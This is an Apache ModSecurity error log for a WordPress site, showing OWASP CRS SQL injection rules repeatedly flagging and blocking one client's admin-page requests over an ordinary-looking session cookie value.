[Mon May 11 18:32:49.259467 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEsTJnyuKVXoStDhbihQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:49.259847 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEsTJnyuKVXoStDhbihQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:49.872630 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEsTJnyuKVXoStDhbihQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:50.112846 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEsjJnyuKVXoStDhbihwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:50.113124 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEsjJnyuKVXoStDhbihwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:50.677882 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEsjJnyuKVXoStDhbihwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:50.772572 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEsjJnyuKVXoStDhbiiQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:50.772994 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEsjJnyuKVXoStDhbiiQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:51.327928 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEsjJnyuKVXoStDhbiiQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:51.434962 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEszJnyuKVXoStDhbiigAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:51.435276 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEszJnyuKVXoStDhbiigAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:51.808760 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEszJnyuKVXoStDhbiigAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:52.082824 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEtDJnyuKVXoStDhbiiwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:52.083121 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEtDJnyuKVXoStDhbiiwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:52.679644 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEtDJnyuKVXoStDhbiiwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:53.014008 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEtTJnyuKVXoStDhbikAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:53.014330 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEtTJnyuKVXoStDhbikAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:54.331732 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEtTJnyuKVXoStDhbikAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:54.476480 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEtjJnyuKVXoStDhbilwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:54.476766 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIEtjJnyuKVXoStDhbilwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:55.215356 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEtjJnyuKVXoStDhbilwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:55.862425 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEtzJnyuKVXoStDhbimgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:55.862718 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIEtzJnyuKVXoStDhbimgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:56.482538 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEtzJnyuKVXoStDhbimgAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:56.598140 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEuDJnyuKVXoStDhbinAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:56.598431 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIEuDJnyuKVXoStDhbinAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:57.194355 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEuDJnyuKVXoStDhbinAAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:57.387643 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEuTJnyuKVXoStDhbinQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:57.387939 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIEuTJnyuKVXoStDhbinQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:57.750593 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEuTJnyuKVXoStDhbinQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:58.050650 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEujJnyuKVXoStDhbinwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:58.050941 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIEujJnyuKVXoStDhbinwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:58.698029 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEujJnyuKVXoStDhbinwAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:59.050747 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEuzJnyuKVXoStDhbioQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:59.051035 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIEuzJnyuKVXoStDhbioQAAAFM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:32:59.666779 2026] [security2:error] [pid 1412074:tid 1412095] [client 31.57.184.104:54430] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIEuzJnyuKVXoStDhbioQAAAFM"], referer: https://rentparadise.fr/wp-login.php
